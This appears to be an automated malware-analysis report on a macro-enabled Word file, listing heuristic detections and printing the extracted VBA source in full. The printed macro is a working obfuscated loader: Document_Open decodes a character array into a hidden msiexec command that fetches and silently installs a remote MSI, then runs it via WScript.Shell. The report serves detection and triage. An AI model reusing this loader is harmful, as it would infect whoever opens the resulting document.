MALICIOUS
250
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 Signed Binary Proxy Execution: Rundll32
The sample contains a VBA macro with an auto-executing Document_Open subroutine. This subroutine is heavily obfuscated but ultimately uses WScript.Shell to execute commands. The script constructs a string that appears to be a command to download and execute a second-stage payload, likely involving rundll32.exe.
Heuristics 8
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
cU_G_JK6doLk = "WSCript.shell": Lzb_LLi55xif2s = 0 Set GTSZ3 = CreateObject(cU_G_JK6doLk) -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
cU_G_JK6doLk = "WSCript.shell": Lzb_LLi55xif2s = 0 Set GTSZ3 = CreateObject(cU_G_JK6doLk) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
cU_G_JK6doLk = "WSCript.shell": Lzb_LLi55xif2s = 0 Set GTSZ3 = CreateObject(cU_G_JK6doLk) Co4TN35T65 = GTSZ3.Run(V_N_E_pQ1gRRuE, Lzb_LLi55xif2s) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() -
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2449 bytes |
SHA-256: 85ae5c21d7fa3c5621b6f93b6722a2e02adbbc5cd3031a434b455bc1d518de5f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
W__Ah2DEx.qohsOJXKd_hU8el_JB47
End Sub
Attribute VB_Name = "W__Ah2DEx"
Sub If_Function()
If TrueFunction Then
MsgBox "True"
End If
End Sub
Function CDC_iDE(V_N_E_pQ1gRRuE As String)
cU_G_JK6doLk = "WSCript.shell": Lzb_LLi55xif2s = 0
Set GTSZ3 = CreateObject(cU_G_JK6doLk)
Co4TN35T65 = GTSZ3.Run(V_N_E_pQ1gRRuE, Lzb_LLi55xif2s)
End Function
Function TrueFunction() As Boolean
TrueFunction = True
End Function
Sub qohsOJXKd_hU8el_JB47()
On Error Resume Next
V2xbxY = K__Fg3(69) & K__Fg3(79) & K__Fg3(102) & K__Fg3(34) & K__Fg3(49) & K__Fg3(101) & K__Fg3(34) & K__Fg3(111) & K__Fg3(117) & K__Fg3(96) & K__Fg3(107) & K__Fg3(71) & K__Fg3(96) & K__Fg3(122) & K__Fg3(96) & K__Fg3(103) & K__Fg3(101)
V2xbxY = V2xbxY & K__Fg3(34) & K__Fg3(49) & K__Fg3(107) & K__Fg3(34) & K__Fg3(106) & K__Fg3(118) & K__Fg3(118) & K__Fg3(114) & K__Fg3(60) & K__Fg3(49) & K__Fg3(49) & K__Fg3(118) & K__Fg3(103) & K__Fg3(110) & K__Fg3(103) & K__Fg3(101) & K__Fg3(113) & K__Fg3(111) & K__Fg3(117) & K__Fg3(103) & K__Fg3(116) & K__Fg3(120) & K__Fg3(107) & K__Fg3(101) & K__Fg3(103) & K__Fg3(117) & K__Fg3(48) & K__Fg3(101) & K__Fg3(113) & K__Fg3(111) & K__Fg3(48) & K__Fg3(103) & K__Fg3(101) & K__Fg3(49) & K__Fg3(99) & K__Fg3(102) & K__Fg3(111) & K__Fg3(107) & K__Fg3(112) & K__Fg3(49) & K__Fg3(117) & K__Fg3(99) & K__Fg3(107) & K__Fg3(48) & _
K__Fg3(111) & K__Fg3(117) & K__Fg3(107) & K__Fg3(34) & K__Fg3(49) & K__Fg3(115) & K__Fg3(112) & K__Fg3(34)
CDC_iDE (V2xbxY)
End Sub
Sub VarExample()
Dim oDoc As Document
Set oDoc = ActiveDocument
oDoc.PrintOut
End Sub
Function K__Fg3(DD)
bfgbdh = "hfgjghngh gfbd bbvcvhfg 345435 jmjgjhdf "
dde = 2
K__Fg3 = Chr(DD - dde)
bvbn = "gffgh hgfj gfhj5454 43543 vbbncv "
End Function
Sub LoopThroughParagraphs()
Dim oPara As Paragraph
For Each oPara In ActiveDocument.Paragraphs
'do something with it. We will just display
'paragraph text if its style is "Heading 4"
If oPara.Style = "Heading 4" Then
MsgBox oPara.Range.Text
End If
Next oPara
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 12800 bytes |
SHA-256: 15fff0d2115f43da653039d83a6dc0d3effe9a4ae5905902baf917acb6f49562 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.